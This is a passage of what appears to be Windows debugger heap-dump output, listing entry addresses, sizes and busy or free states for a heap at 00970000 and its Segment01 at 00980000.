00608 [01] - busy (600) + 00974cb0: 00608 . 00608 [01] - busy (600) + 009752b8: 00608 . 00208 [01] - busy (1fd) + 009754c0: 00208 . 00188 [01] - busy (180) + 00975648: 00188 . 00608 [01] - busy (600) + 00975c50: 00608 . 00608 [01] - busy (600) + 00976258: 00608 . 00228 [01] - busy (219) + 00976480: 00228 . 00608 [01] - busy (600) + 00976a88: 00608 . 00048 [01] - busy (3c) + 00976ad0: 00048 . 00150 [01] - busy (145) + 00976c20: 00150 . 00188 [01] - busy (180) + 00976da8: 00188 . 00110 [01] - busy (107) + 00976eb8: 00110 . 00188 [01] - busy (180) + 00977040: 00188 . 00608 [01] - busy (600) + 00977648: 00608 . 00190 [01] - busy (187) + 009777d8: 00190 . 00608 [01] - busy (600) + 00977de0: 00608 . 00608 [01] - busy (600) + 009783e8: 00608 . 00110 [01] - busy (103) + 009784f8: 00110 . 00220 [01] - busy (216) + 00978718: 00220 . 00188 [01] - busy (180) + 009788a0: 00188 . 00070 [01] - busy (64) + 00978910: 00070 . 00188 [01] - busy (180) + 00978a98: 00188 . 00608 [01] - busy (600) + 009790a0: 00608 . 00608 [01] - busy (600) + 009796a8: 00608 . 00148 [01] - busy (13b) + 009797f0: 00148 . 00188 [01] - busy (180) + 00979978: 00188 . 00608 [01] - busy (600) + 00979f80: 00608 . 00170 [01] - busy (162) + 0097a0f0: 00170 . 00608 [01] - busy (600) + 0097a6f8: 00608 . 00188 [01] - busy (180) + 0097a880: 00188 . 00608 [01] - busy (600) + 0097ae88: 00608 . 00608 [01] - busy (600) + 0097b490: 00608 . 001a8 [01] - busy (19c) + 0097b638: 001a8 . 00098 [01] - busy (8c) + 0097b6d0: 00098 . 00188 [01] - busy (180) + 0097b858: 00188 . 00608 [01] - busy (600) + 0097be60: 00608 . 00188 [01] - busy (180) + 0097bfe8: 00188 . 00188 [01] - busy (180) + 0097c170: 00188 . 00188 [01] - busy (180) + 0097c2f8: 00188 . 00608 [01] - busy (600) + 0097c900: 00608 . 00188 [01] - busy (180) + 0097ca88: 00188 . 00608 [01] - busy (600) + 0097d090: 00608 . 00188 [01] - busy (180) + 0097d218: 00188 . 000c0 [01] - busy (b8) + 0097d2d8: 000c0 . 00188 [01] - busy (180) + 0097d460: 00188 . 
00188 [01] - busy (180) + 0097d5e8: 00188 . 00608 [01] - busy (600) + 0097dbf0: 00608 . 00188 [01] - busy (180) + 0097dd78: 00188 . 00608 [01] - busy (600) + 0097e380: 00608 . 003d8 [01] - busy (3ce) + 0097e758: 003d8 . 003e8 [01] - busy (3dc) + 0097eb40: 003e8 . 003e8 [01] - busy (3dc) + 0097ef28: 003e8 . 003e8 [01] - busy (3dc) + 0097f310: 003e8 . 003e8 [01] - busy (3dc) + 0097f6f8: 003e8 . 00608 [01] - busy (600) + 0097fd00: 00608 . 000f8 [01] - busy (f0) + 0097fdf8: 000f8 . 00150 [01] - busy (148) + 0097ff48: 00150 . 00038 [01] - busy (30) + 0097ff80: 00038 . 00080 [11] - busy (78) + Segment01 at 00980000: + Flags: 00000000 + Base: 00980000 + First Entry: 00980040 + Last Entry: 00a80000 + Total Pages: 00000100 + Total UnCommit: 00000000 + Largest UnCommit:00000000 + UnCommitted Ranges: (0) + + Heap entries for Segment01 in Heap 00970000 + 00980000: 00000 . 00040 [01] - busy (40) + 00980040: 00040 . 40008 [01] - busy (40000) + 009c0048: 40008 . 00608 [01] - busy (600) + 009c0650: 00608 . 01808 [01] - busy (1800) + 009c1e58: 01808 . 00188 [01] - busy (180) + 009c1fe0: 00188 . 00020 [00] + 009c2000: 00020 . 00608 [01] - busy (600) + 009c2608: 00608 . 00608 [01] - busy (600) + 009c2c10: 00608 . 00608 [01] - busy (600) + 009c3218: 00608 . 01808 [01] - busy (1800) + 009c4a20: 01808 . 00160 [01] - busy (158) + 009c4b80: 00160 . 00188 [01] - busy (180) + 009c4d08: 00188 . 00160 [01] - busy (158) + 009c4e68: 00160 . 00188 [01] - busy (180) + 009c4ff0: 00188 . 00608 [01] - busy (600) + 009c55f8: 00608 . 01808 [01] - busy (1800) + 009c6e00: 01808 . 00608 [01] - busy (600) + 009c7408: 00608 . 00178 [01] - busy (16c) + 009c7580: 00178 . 00080 [00] + 009c7600: 00080 . 002e8 [01] - busy (2df) + 009c78e8: 002e8 . 00198 [01] - busy (18a) + 009c7a80: 00198 . 00220 [01] - busy (214) + 009c7ca0: 00220 . 00200 [01] - busy (1f8) + 009c7ea0: 00200 . 001d0 [01] - busy (1c1) + 009c8070: 001d0 . 00260 [01] - busy (257) + 009c82d0: 00260 . 001d8 [01] - busy (1cb) + 009c84a8: 001d8 . 
00168 [01] - busy (160) + 009c8610: 00168 . 00188 [01] - busy (180) + 009c8798: 00188 . 001b0 [01] - busy (1a8) + 009c8948: 001b0 . 001a8 [01] - busy (19d) + 009c8af0: 001a8 . 000c8 [01] - busy (c0) + 009c8bb8: 000c8 . 00050 [01] - busy (48) + 009c8c08: 00050 . 00010 [01] - busy (4) + 009c8c18: 00010 . 00f88 [01] - busy (f7f) + 009c9ba0: 00f88 . 00090 [01] - busy (82) + 009c9c30: 00090 . 003f0 [01] - busy (3e8) + 009ca020: 003f0 . 00128 [01] - busy (120) + 009ca148: 00128 . 00120 [01] - busy (114) + 009ca268: 00120 . 00608 [01] - busy (600) + 009ca870: 00608 . 00148 [01] - busy (140) + 009ca9b8: 00148 . 00608 [01] - busy (600) + 009cafc0: 00608 . 000d0 [01] - busy (c8) + 009cb090: 000d0 . 00608 [01] - busy (600) + 009cb698: 00608 . 00250 [01] - busy (247) + 009cb8e8: 00250 . 00018 [01] - busy (10) + 009cb900: 00018 . 00018 [01] - busy (10) + 009cb918: 00018 . 00020 [01] - busy (18) + 009cb938: 00020 . 00018 [01] - busy (10) + 009cb950: 00018 . 00018 [01] - busy (10) + 009cb968: 00018 . 00010 [01] - busy (2) + 009cb978: 00010 . 00060 [00] + 009cb9d8: 00060 . 00608 [01] - busy (600) + 009cbfe0: 00608 . 00048 [01] - busy (3c) + 009cc028: 00048 . 00020 [01] - busy (18) + 009cc048: 00020 . 00018 [01] - busy (10) + 009cc060: 00018 . 00018 [01] - busy (10) + 009cc078: 00018 . 00188 [01] - busy (180) + 009cc200: 00188 . 00030 [01] - busy (24) + 009cc230: 00030 . 00018 [01] - busy (10) + 009cc248: 00018 . 00188 [01] - busy (180) + 009cc3d0: 00188 . 00030 [01] - busy (22) + 009cc400: 00030 . 00018 [01] - busy (10) + 009cc418: 00018 . 00028 [01] - busy (20) + 009cc440: 00028 . 00018 [01] - busy (10) + 009cc458: 00018 . 00188 [01] - busy (180) + 009cc5e0: 00188 . 00018 [01] - busy (10) + 009cc5f8: 00018 . 00018 [01] - busy (10) + 009cc610: 00018 . 00048 [01] - busy (40) + 009cc658: 00048 . 00018 [01] - busy (10) + 009cc670: 00018 . 00188 [01] - busy (180) + 009cc7f8: 00188 . 00018 [01] - busy (10) + 009cc810: 00018 . 00188 [01] - busy (180) + 009cc998: 00188 . 
00018 [01] - busy (10) + 009cc9b0: 00018 . 00188 [01] - busy (180) + 009ccb38: 00188 . 00018 [01] - busy (c) + 009ccb50: 00018 . 00018 [01] - busy (10) + 009ccb68: 00018 . 00048 [01] - busy (40) + 009ccbb0: 00048 . 00130 [01] - busy (127) + 009ccce0: 00130 . 00188 [01] - busy (180) + 009cce68: 00188 . 00018 [01] - busy (10) + 009cce80: 00018 . 00188 [01] - busy (180) + 009cd008: 00188 . 00608 [01] - busy (600) + 009cd610: 00608 . 00608 [01] - busy (600) + 009cdc18: 00608 . 01808 [01] - busy (1800) + 009cf420: 01808 . 001f8 [01] - busy (1ef) + 009cf618: 001f8 . 00270 [01] - busy (264) + 009cf888: 00270 . 001e0 [01] - busy (1d8) + 009cfa68: 001e0 . 00188 [01] - busy (180) + 009cfbf0: 00188 . 000c8 [01] - busy (c0) + 009cfcb8: 000c8 . 00188 [01] - busy (180) + 009cfe40: 00188 . 005d8 [01] - busy (5ca) + 009d0418: 005d8 . 00080 [01] - busy (78) + 009d0498: 00080 . 00308 [01] - busy (300) + 009d07a0: 00308 . 00188 [01] - busy (180) + 009d0928: 00188 . 00018 [01] - busy (10) + 009d0940: 00018 . 00188 [01] - busy (180) + 009d0ac8: 00188 . 00020 [01] - busy (18) + 009d0ae8: 00020 . 00c10 [01] - busy (c00) + 009d16f8: 00c10 . 003e8 [01] - busy (3dc) + 009d1ae0: 003e8 . 00010 [01] - busy (4) + 009d1af0: 00010 . 00260 [01] - busy (255) + 009d1d50: 00260 . 000f0 [01] - busy (e8) + 009d1e40: 000f0 . 00158 [01] - busy (14f) + 009d1f98: 00158 . 00a60 [01] - busy (a51) + 009d29f8: 00a60 . 00168 [01] - busy (160) + 009d2b60: 00168 . 00178 [01] - busy (16f) + 009d2cd8: 00178 . 00258 [01] - busy (24d) + 009d2f30: 00258 . 00138 [01] - busy (12b) + 009d3068: 00138 . 00158 [01] - busy (150) + 009d31c0: 00158 . 00158 [01] - busy (14a) + 009d3318: 00158 . 00180 [01] - busy (178) + 009d3498: 00180 . 00138 [01] - busy (12b) + 009d35d0: 00138 . 00158 [01] - busy (14f) + 009d3728: 00158 . 00178 [01] - busy (16c) + 009d38a0: 00178 . 00180 [01] - busy (178) + 009d3a20: 00180 . 001f0 [01] - busy (1e4) + 009d3c10: 001f0 . 002c0 [01] - busy (2b4) + 009d3ed0: 002c0 . 
00200 [01] - busy (1f8) + 009d40d0: 00200 . 001f8 [01] - busy (1f0) + 009d42c8: 001f8 . 01808 [01] - busy (1800) + 009d5ad0: 01808 . 00608 [01] - busy (600) + 009d60d8: 00608 . 00608 [01] - busy (600) + 009d66e0: 00608 . 000e8 [01] - busy (dc) + 009d67c8: 000e8 . 00018 [01] - busy (c) + 009d67e0: 00018 . 00030 [01] - busy (28) + 009d6810: 00030 . 00198 [01] - busy (18e) + 009d69a8: 00198 . 00970 [01] - busy (963) + 009d7318: 00970 . 000c0 [01] - busy (b8) + 009d73d8: 000c0 . 001d8 [01] - busy (1cf) + 009d75b0: 001d8 . 00128 [01] - busy (11d) + 009d76d8: 00128 . 00110 [01] - busy (104) + 009d77e8: 00110 . 00168 [01] - busy (15a) + 009d7950: 00168 . 00150 [01] - busy (141) + 009d7aa0: 00150 . 001b0 [01] - busy (1a4) + 009d7c50: 001b0 . 00198 [01] - busy (18d) + 009d7de8: 00198 . 00148 [01] - busy (140) + 009d7f30: 00148 . 003b0 [01] - busy (3a4) + 009d82e0: 003b0 . 00110 [01] - busy (105) + + 009d83f0: 00110 . 001c0 [01] - busy (1b1) + 009d85b0: 001c0 . 001d0 [01] - busy (1c7) + 009d8780: 001d0 . 00160 [00] + 009d88e0: 00160 . 00018 [01] - busy (c) + 009d88f8: 00018 . 00188 [01] - busy (180) + 009d8a80: 00188 . 00020 [01] - busy (18) + 009d8aa0: 00020 . 01808 [01] - busy (1800) + 009da2a8: 01808 . 00608 [01] - busy (600) + 009da8b0: 00608 . 001a8 [01] - busy (19a) + 009daa58: 001a8 . 00608 [01] - busy (600) + 009db060: 00608 . 00140 [01] - busy (133) + 009db1a0: 00140 . 00c08 [01] - busy (c00) + 009dbda8: 00c08 . 00158 [01] - busy (14d) + 009dbf00: 00158 . 00160 [01] - busy (155) + 009dc060: 00160 . 00368 [01] - busy (35e) + 009dc3c8: 00368 . 00140 [01] - busy (132) + 009dc508: 00140 . 01808 [01] - busy (1800) + 009ddd10: 01808 . 00170 [01] - busy (168) + 009dde80: 00170 . 00130 [01] - busy (124) + 009ddfb0: 00130 . 00018 [01] - busy (10) + 009ddfc8: 00018 . 00018 [01] - busy (4) + 009ddfe0: 00018 . 00188 [01] - busy (180) + 009de168: 00188 . 00188 [01] - busy (180) + 009de2f0: 00188 . 00188 [01] - busy (180) + 009de478: 00188 . 
00608 [01] - busy (600) + 009dea80: 00608 . 00158 [01] - busy (150) + 009debd8: 00158 . 00020 [01] - busy (18) + 009debf8: 00020 . 00020 [01] - busy (14) + 009dec18: 00020 . 00018 [01] - busy (10) + 009dec30: 00018 . 00020 [01] - busy (18) + 009dec50: 00020 . 00018 [01] - busy (10) + 009dec68: 00018 . 00018 [01] - busy (10) + 009dec80: 00018 . 00018 [01] - busy (10) + 009dec98: 00018 . 00010 [01] - busy (4) + 009deca8: 00010 . 00070 [01] - busy (64) + 009ded18: 00070 . 00198 [01] - busy (18c) + 009deeb0: 00198 . 00020 [01] - busy (18) + 009deed0: 00020 . 000f0 [01] - busy (e8) + 009defc0: 000f0 . 00210 [01] - busy (202) + 009df1d0: 00210 . 00218 [01] - busy (20e) + 009df3e8: 00218 . 00238 [01] - busy (229) + 009df620: 00238 . 000d0 [01] - busy (c0) + 009df6f0: 000d0 . 004a0 [01] - busy (498) + 009dfb90: 004a0 . 00098 [01] - busy (90) + 009dfc28: 00098 . 00120 [01] - busy (117) + 009dfd48: 00120 . 001d0 [01] - busy (1c1) + 009dff18: 001d0 . 40008 [01] - busy (40000) + 00a1ff20: 40008 . 00330 [01] - busy (324) + 00a20250: 00330 . 00188 [01] - busy (180) + 00a203d8: 00188 . 00150 [01] - busy (145) + 00a20528: 00150 . 00190 [01] - busy (188) + 00a206b8: 00190 . 00188 [01] - busy (180) + 00a20840: 00188 . 00218 [01] - busy (210) + 00a20a58: 00218 . 00188 [01] - busy (180) + 00a20be0: 00188 . 00188 [01] - busy (180) + 00a20d68: 00188 . 00040 [01] - busy (38) + 00a20da8: 00040 . 00120 [01] - busy (117) + 00a20ec8: 00120 . 00020 [01] - busy (18) + 00a20ee8: 00020 . 000e8 [01] - busy (dc) + 00a20fd0: 000e8 . 00608 [01] - busy (600) + 00a215d8: 00608 . 00178 [01] - busy (170) + 00a21750: 00178 . 00270 [01] - busy (268) + 00a219c0: 00270 . 00078 [01] - busy (64) + 00a21a38: 00078 . 00190 [01] - busy (184) + 00a21bc8: 00190 . 00608 [01] - busy (600) + 00a221d0: 00608 . 00188 [01] - busy (180) + 00a22358: 00188 . 00188 [01] - busy (180) + 00a224e0: 00188 . 001e0 [01] - busy (1d8) + 00a226c0: 001e0 . 00188 [01] - busy (180) + 00a22848: 00188 . 
00120 [01] - busy (117) + 00a22968: 00120 . 00028 [01] - busy (20) + 00a22990: 00028 . 00018 [01] - busy (c) + 00a229a8: 00018 . 00188 [01] - busy (180) + 00a22b30: 00188 . 00018 [01] - busy (10) + 00a22b48: 00018 . 00020 [01] - busy (14) + 00a22b68: 00020 . 00020 [01] - busy (14) + 00a22b88: 00020 . 00048 [01] - busy (40) + 00a22bd0: 00048 . 00288 [01] - busy (27b) + 00a22e58: 00288 . 00250 [01] - busy (244) + 00a230a8: 00250 . 00148 [01] - busy (140) + 00a231f0: 00148 . 001e0 [01] - busy (1d8) + 00a233d0: 001e0 . 00608 [01] - busy (600) + 00a239d8: 00608 . 00170 [01] - busy (164) + 00a23b48: 00170 . 001e0 [01] - busy (1d8) + 00a23d28: 001e0 . 00070 [01] - busy (62) + 00a23d98: 00070 . 00148 [01] - busy (13a) + 00a23ee0: 00148 . 000f0 [01] - busy (e8) + 00a23fd0: 000f0 . 001b0 [01] - busy (1a4) + 00a24180: 001b0 . 003a0 [01] - busy (397) + 00a24520: 003a0 . 001e0 [01] - busy (1d4) + 00a24700: 001e0 . 00200 [01] - busy (1f8) + 00a24900: 00200 . 00150 [01] - busy (146) + 00a24a50: 00150 . 00258 [01] - busy (250) + 00a24ca8: 00258 . 001e8 [01] - busy (1d9) + 00a24e90: 001e8 . 00258 [01] - busy (250) + 00a250e8: 00258 . 00158 [01] - busy (150) + 00a25240: 00158 . 001e0 [01] - busy (1d8) + 00a25420: 001e0 . 001e0 [01] - busy (1d8) + 00a25600: 001e0 . 00080 [01] - busy (78) + 00a25680: 00080 . 00070 [01] - busy (60) + 00a256f0: 00070 . 001e0 [01] - busy (1d8) + 00a258d0: 001e0 . 00608 [01] - busy (600) + 00a25ed8: 00608 . 00338 [01] - busy (330) + 00a26210: 00338 . 00188 [01] - busy (180) + 00a26398: 00188 . 00278 [01] - busy (26a) + 00a26610: 00278 . 001e0 [01] - busy (1d8) + 00a267f0: 001e0 . 00188 [01] - busy (180) + 00a26978: 00188 . 00178 [01] - busy (16c) + 00a26af0: 00178 . 002b8 [01] - busy (2ae) + 00a26da8: 002b8 . 00188 [01] - busy (180) + 00a26f30: 00188 . 001e0 [01] - busy (1d8) + 00a27110: 001e0 . 00188 [01] - busy (180) + 00a27298: 00188 . 00180 [01] - busy (174) + 00a27418: 00180 . 00178 [01] - busy (16c) + 00a27590: 00178 . 
00168 [01] - busy (160) + 00a276f8: 00168 . 00178 [01] - busy (16c) + 00a27870: 00178 . 00170 [01] - busy (164) + 00a279e0: 00170 . 00180 [01] - busy (174) + 00a27b60: 00180 . 00168 [01] - busy (15c) + 00a27cc8: 00168 . 00168 [01] - busy (15c) + 00a27e30: 00168 . 00178 [01] - busy (16c) + 00a27fa8: 00178 . 00168 [01] - busy (160) + 00a28110: 00168 . 00118 [01] - busy (10c) + 00a28228: 00118 . 00130 [01] - busy (121) + 00a28358: 00130 . 001f8 [01] - busy (1eb) + 00a28550: 001f8 . 001c0 [01] - busy (1b2) + 00a28710: 001c0 . 00150 [01] - busy (144) + 00a28860: 00150 . 00188 [01] - busy (17d) + 00a289e8: 00188 . 00280 [01] - busy (278) + 00a28c68: 00280 . 002b0 [01] - busy (2a4) + 00a28f18: 002b0 . 00020 [01] - busy (18) + 00a28f38: 00020 . 000f0 [01] - busy (e8) + 00a29028: 000f0 . 001e0 [01] - busy (1d8) + 00a29208: 001e0 . 000c8 [01] - busy (c0) + 00a292d0: 000c8 . 00298 [01] - busy (290) + 00a29568: 00298 . 00178 [01] - busy (170) + 00a296e0: 00178 . 00608 [01] - busy (600) + 00a29ce8: 00608 . 001c0 [01] - busy (1b4) + 00a29ea8: 001c0 . 00110 [01] - busy (104) + 00a29fb8: 00110 . 00128 [01] - busy (11c) + 00a2a0e0: 00128 . 00140 [01] - busy (134) + 00a2a220: 00140 . 00020 [01] - busy (14) + 00a2a240: 00020 . 00608 [01] - busy (600) + 00a2a848: 00608 . 00170 [01] - busy (164) + 00a2a9b8: 00170 . 00138 [01] - busy (12c) + 00a2aaf0: 00138 . 00028 [01] - busy (20) + 00a2ab18: 00028 . 001e0 [01] - busy (1d8) + 00a2acf8: 001e0 . 00188 [01] - busy (180) + 00a2ae80: 00188 . 000c8 [01] - busy (c0) + 00a2af48: 000c8 . 00098 [00] + 00a2afe0: 00098 . 001e0 [01] - busy (1d8) + 00a2b1c0: 001e0 . 00188 [01] - busy (180) + 00a2b348: 00188 . 000c8 [01] - busy (c0) + 00a2b410: 000c8 . 00098 [01] - busy (8c) + 00a2b4a8: 00098 . 001e0 [01] - busy (1d8) + 00a2b688: 001e0 . 00188 [01] - busy (180) + 00a2b810: 00188 . 000c8 [01] - busy (c0) + 00a2b8d8: 000c8 . 00098 [01] - busy (88) + 00a2b970: 00098 . 001e0 [01] - busy (1d8) + 00a2bb50: 001e0 . 
00188 [01] - busy (180) + 00a2bcd8: 00188 . 000c8 [01] - busy (c0) + 00a2bda0: 000c8 . 00098 [01] - busy (84) + 00a2be38: 00098 . 00188 [01] - busy (180) + 00a2bfc0: 00188 . 001e0 [01] - busy (1d8) + 00a2c1a0: 001e0 . 00308 [01] - busy (300) + 00a2c4a8: 00308 . 00178 [01] - busy (169) + 00a2c620: 00178 . 00168 [01] - busy (160) + 00a2c788: 00168 . 000c8 [01] - busy (c0) + 00a2c850: 000c8 . 00088 [01] - busy (80) + 00a2c8d8: 00088 . 00010 [01] - busy (4) + 00a2c8e8: 00010 . 001e0 [01] - busy (1d8) + 00a2cac8: 001e0 . 00188 [01] - busy (180) + 00a2cc50: 00188 . 00188 [01] - busy (180) + 00a2cdd8: 00188 . 00608 [01] - busy (600) + 00a2d3e0: 00608 . 001e0 [01] - busy (1d8) + 00a2d5c0: 001e0 . 00160 [01] - busy (158) + 00a2d720: 00160 . 00188 [01] - busy (180) + 00a2d8a8: 00188 . 001e0 [01] - busy (1d8) + 00a2da88: 001e0 . 00188 [01] - busy (180) + 00a2dc10: 00188 . 00160 [01] - busy (157) + 00a2dd70: 00160 . 001e0 [01] - busy (1d8) + 00a2df50: 001e0 . 00188 [01] - busy (180) + 00a2e0d8: 00188 . 00160 [01] - busy (158) + 00a2e238: 00160 . 001e0 [01] - busy (1d8) + 00a2e418: 001e0 . 00188 [01] - busy (180) + 00a2e5a0: 00188 . 00168 [01] - busy (15c) + 00a2e708: 00168 . 00188 [01] - busy (180) + 00a2e890: 00188 . 00178 [01] - busy (170) + 00a2ea08: 00178 . 00168 [01] - busy (160) + 00a2eb70: 00168 . 00188 [01] - busy (180) + 00a2ecf8: 00188 . 00608 [01] - busy (600) + 00a2f300: 00608 . 001b8 [01] - busy (1b0) + 00a2f4b8: 001b8 . 00168 [01] - busy (15c) + 00a2f620: 00168 . 00170 [01] - busy (164) + 00a2f790: 00170 . 00168 [01] - busy (15c) + 00a2f8f8: 00168 . 001d0 [01] - busy (1c7) + 00a2fac8: 001d0 . 00120 [01] - busy (113) + 00a2fbe8: 00120 . 00018 [01] - busy (10) + 00a2fc00: 00018 . 00268 [01] - busy (25c) + 00a2fe68: 00268 . 00128 [01] - busy (120) + 00a2ff90: 00128 . 00248 [01] - busy (240) + 00a301d8: 00248 . 00198 [01] - busy (18f) + 00a30370: 00198 . 00210 [01] - busy (204) + 00a30580: 00210 . 00048 [01] - busy (40) + 00a305c8: 00048 . 
00350 [01] - busy (344) + 00a30918: 00350 . 00288 [01] - busy (27e) + 00a30ba0: 00288 . 00180 [01] - busy (176) + 00a30d20: 00180 . 00108 [01] - busy (100) + 00a30e28: 00108 . 00058 [01] - busy (48) + 00a30e80: 00058 . 00160 [01] - busy (158) + 00a30fe0: 00160 . 00030 [01] - busy (24) + 00a31010: 00030 . 00160 [01] - busy (158) + 00a31170: 00160 . 001e0 [01] - busy (1d8) + 00a31350: 001e0 . 00188 [01] - busy (180) + 00a314d8: 00188 . 001e0 [01] - busy (1d8) + 00a316b8: 001e0 . 00160 [01] - busy (154) + 00a31818: 00160 . 001e0 [01] - busy (1d8) + 00a319f8: 001e0 . 00188 [01] - busy (180) + 00a31b80: 00188 . 00160 [01] - busy (158) + 00a31ce0: 00160 . 001e0 [01] - busy (1d8) + 00a31ec0: 001e0 . 00608 [01] - busy (600) + 00a324c8: 00608 . 00190 [01] - busy (188) + 00a32658: 00190 . 00608 [01] - busy (600) + 00a32c60: 00608 . 00608 [01] - busy (600) + 00a33268: 00608 . 001e0 [01] - busy (1d8) + 00a33448: 001e0 . 001e0 [01] - busy (1d8) + 00a33628: 001e0 . 00170 [01] - busy (164) + 00a33798: 00170 . 00170 [01] - busy (164) + 00a33908: 00170 . 00170 [01] - busy (168) + 00a33a78: 00170 . 00170 [01] - busy (168) + 00a33be8: 00170 . 00168 [01] - busy (160) + 00a33d50: 00168 . 00170 [01] - busy (164) + 00a33ec0: 00170 . 00178 [01] - busy (16c) + 00a34038: 00178 . 00188 [01] - busy (180) + 00a341c0: 00188 . 00188 [01] - busy (180) + 00a34348: 00188 . 00188 [01] - busy (180) + 00a344d0: 00188 . 00188 [01] - busy (180) + 00a34658: 00188 . 00170 [01] - busy (164) + 00a347c8: 00170 . 00170 [01] - busy (168) + 00a34938: 00170 . 00168 [01] - busy (15c) + 00a34aa0: 00168 . 00170 [01] - busy (168) + 00a34c10: 00170 . 00160 [01] - busy (158) + 00a34d70: 00160 . 00260 [01] - busy (251) + 00a34fd0: 00260 . 00b60 [01] - busy (b53) + 00a35b30: 00b60 . 003b8 [01] - busy (3ad) + 00a35ee8: 003b8 . 000c8 [01] - busy (c0) + 00a35fb0: 000c8 . 00198 [01] - busy (190) + 00a36148: 00198 . 001f8 [01] - busy (1ec) + 00a36340: 001f8 . 00168 [01] - busy (160) + 00a364a8: 00168 . 
00170 [01] - busy (168) + 00a36618: 00170 . 001d0 [01] - busy (1c4) + 00a367e8: 001d0 . 00198 [01] - busy (190) + 00a36980: 00198 . 001b8 [01] - busy (1b0) + 00a36b38: 001b8 . 00168 [01] - busy (15c) + 00a36ca0: 00168 . 00178 [01] - busy (16c) + 00a36e18: 00178 . 00170 [01] - busy (164) + 00a36f88: 00170 . 00180 [01] - busy (174) + 00a37108: 00180 . 00178 [01] - busy (170) + 00a37280: 00178 . 00180 [01] - busy (178) + 00a37400: 00180 . 00178 [01] - busy (16c) + 00a37578: 00178 . 00170 [01] - busy (164) + 00a376e8: 00170 . 00168 [01] - busy (15c) + 00a37850: 00168 . 00188 [01] - busy (17c) + 00a379d8: 00188 . 00170 [01] - busy (164) + 00a37b48: 00170 . 00190 [01] - busy (184) + 00a37cd8: 00190 . 00160 [01] - busy (158) + 00a37e38: 00160 . 003a0 [01] - busy (398) + 00a381d8: 003a0 . 002b0 [01] - busy (2a4) + 00a38488: 002b0 . 002a8 [01] - busy (29c) + 00a38730: 002a8 . 002a8 [01] - busy (29c) + 00a389d8: 002a8 . 00248 [01] - busy (23c) + 00a38c20: 00248 . 00248 [01] - busy (23c) + 00a38e68: 00248 . 00138 [01] - busy (12c) + 00a38fa0: 00138 . 00048 [01] - busy (3a) + 00a38fe8: 00048 . 00018 [00] + 00a39000: 00018 . 00178 [01] - busy (16f) + 00a39178: 00178 . 00188 [01] - busy (180) + 00a39300: 00188 . 00110 [01] - busy (108) + 00a39410: 00110 . 00188 [01] - busy (180) + 00a39598: 00188 . 00138 [01] - busy (12d) + 00a396d0: 00138 . 00180 [01] - busy (174) + 00a39850: 00180 . 00010 [01] - busy (4) + 00a39860: 00010 . 00010 [01] - busy (4) + 00a39870: 00010 . 00168 [01] - busy (15c) + 00a399d8: 00168 . 18008 [01] - busy (18000) + 00a519e0: 18008 . 002c0 [01] - busy (2b4) + 00a51ca0: 002c0 . 00368 [01] - busy (35d) + 00a52008: 00368 . 00198 [01] - busy (18e) + 00a521a0: 00198 . 00330 [01] - busy (324) + 00a524d0: 00330 . 00488 [01] - busy (47c) + 00a52958: 00488 . 003c8 [01] - busy (3c0) + 00a52d20: 003c8 . 00608 [01] - busy (600) + 00a53328: 00608 . 001d8 [01] - busy (1c9) + 00a53500: 001d8 . 00188 [01] - busy (180) + 00a53688: 00188 . 
001e0 [01] - busy (1d8) + 00a53868: 001e0 . 00108 [01] - busy (100) + 00a53970: 00108 . 00108 [01] - busy (100) + 00a53a78: 00108 . 00108 [01] - busy (100) + 00a53b80: 00108 . 00160 [01] - busy (158) + 00a53ce0: 00160 . 00190 [01] - busy (180) + 00a53e70: 00190 . 00178 [01] - busy (16c) + 00a53fe8: 00178 . 00188 [01] - busy (180) + 00a54170: 00188 . 00180 [01] - busy (174) + 00a542f0: 00180 . 00028 [01] - busy (20) + 00a54318: 00028 . 00018 [01] - busy (10) + 00a54330: 00018 . 01300 [01] - busy (12f7) + 00a55630: 01300 . 00818 [01] - busy (809) + 00a55e48: 00818 . 001b0 [01] - busy (1a8) + 00a55ff8: 001b0 . 00288 [01] - busy (27b) + 00a56280: 00288 . 00488 [01] - busy (47e) + 00a56708: 00488 . 00188 [01] - busy (180) + 00a56890: 00188 . 00188 [01] - busy (180) + 00a56a18: 00188 . 00188 [01] - busy (180) + 00a56ba0: 00188 . 00188 [01] - busy (180) + 00a56d28: 00188 . 00188 [01] - busy (17c) + 00a56eb0: 00188 . 00128 [01] - busy (120) + 00a56fd8: 00128 . 00010 [01] - busy (8) + 00a56fe8: 00010 . 001b8 [01] - busy (1b0) + 00a571a0: 001b8 . 00188 [01] - busy (180) + 00a57328: 00188 . 00188 [01] - busy (180) + 00a574b0: 00188 . 00608 [01] - busy (600) + 00a57ab8: 00608 . 00170 [01] - busy (161) + 00a57c28: 00170 . 001e0 [01] - busy (1d8) + 00a57e08: 001e0 . 00188 [01] - busy (180) + 00a57f90: 00188 . 00048 [01] - busy (40) + 00a57fd8: 00048 . 00018 [00] + 00a57ff0: 00018 . 003e8 [01] - busy (3dc) + 00a583d8: 003e8 . 00188 [01] - busy (17c) + 00a58560: 00188 . 00450 [01] - busy (441) + 00a589b0: 00450 . 000c8 [01] - busy (c0) + 00a58a78: 000c8 . 00010 [01] - busy (8) + 00a58a88: 00010 . 00010 [01] - busy (4) + 00a58a98: 00010 . 003e8 [01] - busy (3dc) + 00a58e80: 003e8 . 00120 [01] - busy (114) + 00a58fa0: 00120 . 00010 [01] - busy (8) + 00a58fb0: 00010 . 00040 [00] + 00a58ff0: 00040 . 00170 [01] - busy (164) + 00a59160: 00170 . 00288 [01] - busy (280) + 00a593e8: 00288 . 00188 [01] - busy (180) + 00a59570: 00188 . 00168 [01] - busy (15c) + 00a596d8: 00168 . 
00170 [01] - busy (164) + 00a59848: 00170 . 001e0 [01] - busy (1d8) + 00a59a28: 001e0 . 00050 [01] - busy (40) + 00a59a78: 00050 . 00190 [01] - busy (188) + 00a59c08: 00190 . 00190 [01] - busy (185) + 00a59d98: 00190 . 00178 [01] - busy (16c) + 00a59f10: 00178 . 00170 [01] - busy (168) + 00a5a080: 00170 . 00160 [01] - busy (154) + 00a5a1e0: 00160 . 00178 [01] - busy (170) + 00a5a358: 00178 . 003e8 [01] - busy (3dc) + 00a5a740: 003e8 . 001d0 [01] - busy (1c7) + 00a5a910: 001d0 . 00160 [01] - busy (157) + 00a5aa70: 00160 . 001b0 [01] - busy (1a8) + 00a5ac20: 001b0 . 00188 [01] - busy (17e) + 00a5ada8: 00188 . 00210 [01] - busy (202) + 00a5afb8: 00210 . 00050 [01] - busy (40) + 00a5b008: 00050 . 00240 [01] - busy (238) + 00a5b248: 00240 . 002a8 [01] - busy (29c) + 00a5b4f0: 002a8 . 00248 [01] - busy (23c) + 00a5b738: 00248 . 00278 [01] - busy (270) + 00a5b9b0: 00278 